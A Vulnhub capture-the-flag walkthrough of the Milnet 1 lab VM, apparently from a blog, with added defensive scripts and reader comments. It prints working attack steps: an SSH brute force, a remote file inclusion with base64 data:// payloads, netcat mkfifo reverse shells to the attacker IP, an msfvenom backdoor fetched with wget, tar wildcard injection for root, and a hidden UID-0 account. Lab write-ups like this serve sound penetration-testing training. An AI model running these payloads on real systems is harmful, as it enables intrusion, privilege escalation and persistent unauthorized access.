Vulnhub Walkthrough: Milnet 1

In this post we examine Milnet, a vulnerable target hosted on http://www.vulnhub.com

The pentester began by identifying the IP address of the target using netdiscover.

root@kali2:~# netdiscover -r 192.168.73.0/24        

192.168.73.130  00:0c:29:bd:ec:5f   1   60  VMware, Inc.           

The pentester used nmap to identify network applications.

root@kali2:~# nmap -Pn -n -p- -T4 192.168.73.130

22/tcp open  ssh

80/tcp open  http

root@kali2:~# nmap -A -Pn -n -p 22,80 192.168.73.130

22/tcp open  ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

80/tcp open  http lighttpd 1.4.35


The target does not appear to be vulnerable to remote access exploits. The pentester initiated a password attack against the SSH service using THC Hydra.

root@kali2:/usr/share/wordlists# hydra -l root -P fasttrack.txt -e nsr ssh://192.168.73.130

With the password attack underway, the pentester began enumerating the web server with Nikto. The scan results indicated that a web page, /info.php, was present and may contain sensitive information.

root@kali2:/# nikto -h 192.168.73.130

+ /info.php: Output from the phpinfo() function was found.

+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.

The pentester then began a manual examination of the web server by browsing to each page, reviewing the source code, and understanding the functionality of the web site. After an initial examination, the pentester browsed to the following URI:

http://192.168.73.130/info.php

This page contains a significant amount of information regarding the PHP version running on the web server.


One entry catches the pentester’s eye, which suggests that a file inclusion vulnerability may be present:

allow_url_include: on


The pentester needs more information to construct an effective attack. The pentester utilized OWASP-ZAP to scan the target web server for vulnerabilities.

root@kali2:/# owasp-zap &


OWASP-ZAP reported a remote file inclusion vulnerability affecting the URI http://192.168.73.130/content.php, in a POST parameter of the request.

To prepare a file inclusion attack, the pentester enabled the Firefox web browser extension Tamper Data, which functions as a proxy to intercept HTTP requests and modify GET/POST parameters. The pentester opened a netcat listener on TCP port 80, and prepared a test exploit in Tamper Data by browsing to the affected URI, intercepting the request, and modifying the POST parameter value with a test exploit string. After submitting the request, the pentester confirmed that this is a classic remote file inclusion vulnerability.

The pentester tried uploading various backdoors and reverse shell PHP code; however, the environment prevented the code from executing. Instead, the pentester refined the exploitation to use PHP's data:// stream wrapper, which can result in arbitrary code execution.

The pentester first crafted a test command in PHP:

<?php system('ls -lsa /bin'); ?>

The pentester took the above string, and converted it to base64 using an online base64 encoder.

Next, the pentester constructed the following string:

data://text/plain;base64,PD9waHAgc3lzdGVtKCdscyAtbHNhIC9iaW4nKTsgPz4=

The pentester then repeated the initial RFI exploit method, this time using the crafted base64 command in the POST parameter value. It works, and the pentester receives the output of the ls -lsa /bin command, revealing various binaries in the /bin directory. The pentester identifies netcat in this directory, and prepares a new attack to achieve a remote shell.

First, the pentester opens a listener on his attack platform:

nc -nlvp 1234

Next, the pentester crafts a reverse shell one liner. Notice that traditional netcat reverse shells do not work in this environment; instead, the following string was constructed to achieve the same effect:

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.73.133 1234 >/tmp/f'); ?>

The pentester took the above string and base64 encoded it. The pentester then crafted the following string, which serves as the reverse shell payload:

data://text/plain;base64,PD9waHAgc3lzdGVtKCdybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjczLjEzMyAxMjM0ID4vdG1wL2YnKTsgPz4=

As before, the pentester took the reverse shell payload string and inserted it into the POST parameter value of the /content.php request using Tamper Data. The pentester then received a reverse shell with low level privileges of the www-data user.
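The two payloads above are ordinary data: URIs, so an analyst who finds such a value in a request log or in a web application's include parameter can classify and decode it without executing anything. The following shell functions are an added example written for this post (they are not part of the original walkthrough or of the Milnet target): classify_include_target reports which category a would-be include() argument falls into, and decode_data_uri recovers the base64 payload from a data: URI. The category names and the list of stream wrappers checked are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): triage the value an
# application is about to pass to include()/require().
# Returns 0 for a plain relative filename, 1 for anything that names a
# stream wrapper, remote URL, absolute path or traversal sequence.

# Print only the decoded payload of a base64 data: URI (used for triage
# and by the classifier below).
decode_data_uri() {
    payload=${1#*;base64,}
    printf '%s' "$payload" | base64 -d
}

classify_include_target() {
    value=$1
    case "$value" in
        data:*)
            # data: URIs carry the payload inline; show it decoded so the
            # analyst can see what the include would have executed.
            if [ "${value#*;base64,}" != "$value" ]; then
                printf 'data wrapper, base64 payload: %s\n' \
                    "$(decode_data_uri "$value")"
            else
                printf 'data wrapper, raw payload: %s\n' "${value#*,}"
            fi
            return 1 ;;
        http://*|https://*|ftp://*|ftps://*)
            printf 'remote URL (needs allow_url_include): %s\n' "$value"
            return 1 ;;
        php://*|phar://*|expect://*|zip://*|glob://*|file://*)
            printf 'local stream wrapper: %s\n' "$value"
            return 1 ;;
        /*|*../*)
            printf 'absolute path or traversal: %s\n' "$value"
            return 1 ;;
        *)
            printf 'plain filename: %s\n' "$value"
            return 0 ;;
    esac
}

# Demonstration on the first payload shown in the walkthrough.
classify_include_target 'data://text/plain;base64,PD9waHAgc3lzdGVtKCdscyAtbHNhIC9iaW4nKTsgPz4='
classify_include_target 'index.php'
```

In a real deployment the application should never accept a user-supplied include path at all; a fixed allowlist of page names mapped to files on disk, together with allow_url_include set to Off, removes the whole class. The classifier above is for log review and triage, not as a runtime filter.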


The pentester then began post-exploitation activities, focusing on privilege escalation. First, the pentester needed a shell with greater stability. To achieve this, the pentester used msfvenom to create a new reverse shell payload. The pentester then hosted it on a web server, and used wget from the target to download the file.

On Attack Platform:

service apache2 start

cd /var/www/html

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.73.133 lport=4444 -f elf -o backdoor.elf

nc -nlvp 4444

On Target/Victim

cd /tmp

wget http://192.168.73.133/backdoor.elf

chmod 755 backdoor.elf

./backdoor.elf &

The pentester now had a more stable shell to the victim. The pentester then used python to spawn a tty terminal for greater functionality.

python3 -c 'import pty; pty.spawn("/bin/sh")'

Now the pentester focused on privilege escalation. The pentester used an automated script to examine the target for any possible privilege escalation vulnerabilities. The privilege escalation script can be downloaded from:

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

On Target/Victim:

cd /tmp

wget http://192.168.73.133/linenum.sh   

chmod 755 linenum.sh

./linenum.sh

The script will run through many entries on the system to find possible vulnerabilities. The pentester noticed several entries of interest.

A user known as T. G. Langman appears to be the only conventional user account on the system.

langman:x:1000:1000:T. G. Langman,,,:/home/langman:/bin/bash

His home directory is world readable and executable.

drwxr-xr-x  4 langman langman 4.0K May 21 22:27 langman

There is also a backup script that runs every minute.

Cronjob

*/1 *     * * *     root    /backup/backup.sh

The pentester examined the contents of /backup/backup.sh and observed that it uses tar to back up the contents of the /var/www/html directory every minute. This does not appear overtly vulnerable.

#!/bin/bash

cd /var/www/html

tar cf /backup/backup.tgz *

Remembering that Langman’s directory was not read or execute restricted, the pentester navigated to his directory and began examining his files, finding one of particular interest:

cd /home/langman/SDINET

less DefenseCode_Unix_WildCards_Gone_Wild.txt

Section 4.3 of DefenseCode_Unix_WildCards_Gone_Wild.txt reveals a shell command injection technique targeting tar. In essence, the technique works by creating files whose filename contains parameters and arguments that can be injected into shell commands, if the proper conditions exist. The pentester crafts commands in order to try this technique.

First, the pentester opened an additional listener on his attack platform:

nc -nlvp 2112

On the target/victim, the pentester crafts three files to achieve arbitrary command execution stemming from the tar command within the backup.sh script.

cd /var/www/html

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.73.133 2112 >/tmp/f" > shell.sh

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

touch "/var/www/html/--checkpoint=1"

In essence, the unquoted * in backup.sh expands the crafted filenames into tar options, causing tar to execute shell.sh after the first file is archived. Since the backup.sh script is running as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 2112.
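The root cause is that backup.sh lets shell globbing turn file names into tar arguments. The script below is an added example written for this post, not the target's backup.sh: safe_backup archives a directory with -C dir . so every member is a path and never an option, and find_option_like_names is the check an administrator can run over a web root to spot names beginning with a dash. The demo directory, its file names and the output paths are constructed here; the option-shaped name is stored in the archive as an ordinary file, which is the whole point.

```shell
#!/bin/sh
# Added example (not the original backup.sh): a backup routine that cannot
# be steered by file names in the archived directory, plus an audit check.

# Archive the contents of $1 into $2. Using '-C dir .' (or '--' before a
# glob) makes tar treat every member as a path, so a name such as
# '--checkpoint=1' is stored, never parsed as an option.
safe_backup() {
    src=$1
    out=$2
    tar -cf "$out" -C "$src" .
}

# Print names directly under $1 that begin with '-'. Such names have no
# business in a web root and are the hallmark of the wildcard trick.
find_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -exec basename {} \;
}

# Constructed demonstration directory: one ordinary file and one file whose
# name is option-shaped. The name alone does nothing; it only matters when
# an unquoted glob expands it in front of tar.
demo_dir=$(mktemp -d)
printf 'hello\n' > "$demo_dir/index.html"
touch "$demo_dir/--checkpoint=1"

safe_backup "$demo_dir" "$demo_dir.tar"
echo "archived members (option-shaped name stored as a plain file):"
tar -tf "$demo_dir.tar"
echo "option-like names found in the directory:"
find_option_like_names "$demo_dir"

rm -rf "$demo_dir" "$demo_dir.tar"
```

Running find_option_like_names from cron against the web root, and alerting on any output, gives a cheap detection for this technique; fixing the tar invocation removes the need for it on this script, but other scripts that glob user-writable directories have the same exposure.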


After about 1 minute, the pentester receives a callback and with it, root permissions. The pentester now has total control over the system.


To sustain easy access, the pentester created a new user with root privileges.

useradd -ou 0 -g 0 michael

passwd michael
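A second account with UID 0, which useradd only permits because of the -o flag, is easy to find from the defender's side. The functions below are an added example written for this post (not from the walkthrough): extra_uid0_accounts lists every passwd entry sharing UID 0 with root, and duplicate_uids generalises that to any UID used by more than one account. The sample passwd file is constructed to mirror the state the walkthrough leaves behind; michael's home and shell are assumed defaults.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): audit a passwd-format
# file for accounts that share a UID. Takes the file path as an argument so
# it can run against /etc/passwd or against a copy pulled from a host.

# Print every account with UID 0 whose name is not 'root'.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print every UID that is used by more than one account (the -o flag to
# useradd is what makes this possible; it should never be set on a server).
duplicate_uids() {
    awk -F: '{ count[$3]++ } END { for (u in count) if (count[u] > 1) print u }' "$1" | sort -n
}

# Constructed sample: the target's visible accounts plus the one added above.
sample=$(mktemp)
cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
langman:x:1000:1000:T. G. Langman,,,:/home/langman:/bin/bash
michael:x:0:0::/home/michael:/bin/sh
EOF

echo "accounts sharing UID 0 with root:"
extra_uid0_accounts "$sample"
echo "UIDs used by more than one account:"
duplicate_uids "$sample"
rm -f "$sample"
```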

Conclusion:

This target was a great exercise in remote file inclusion and shell poisoning. The best way of mitigating these issues is by sanitizing user input. Remember the old adage of programming: garbage in, garbage out. Thanks for the great exercise Warrior. See you next time on noob2root. Cheers.


3 thoughts on "Vulnhub Walkthrough: Milnet 1"

  1. Hi, I cannot for the life of me get OWASP ZAP to show an alert for RFI. I've looked for how to configure it etc, and updating it but it still fails to show the alert. Any tips?? 🙂


    1. Hi Meme, thanks for reading. I understand your frustration with OWASP ZAP not working as expected. Try entering the URL as:
      http://IP/content.php
      And then relaunch the scan.
      If that doesn’t work, try running OWASP ZAP in the latest version of Kali 2 and make sure everything is upgraded/updated. If that doesn’t work, consider uninstalling and reinstalling OWASP ZAP. If all else fails, verify the finding manually. Good luck!

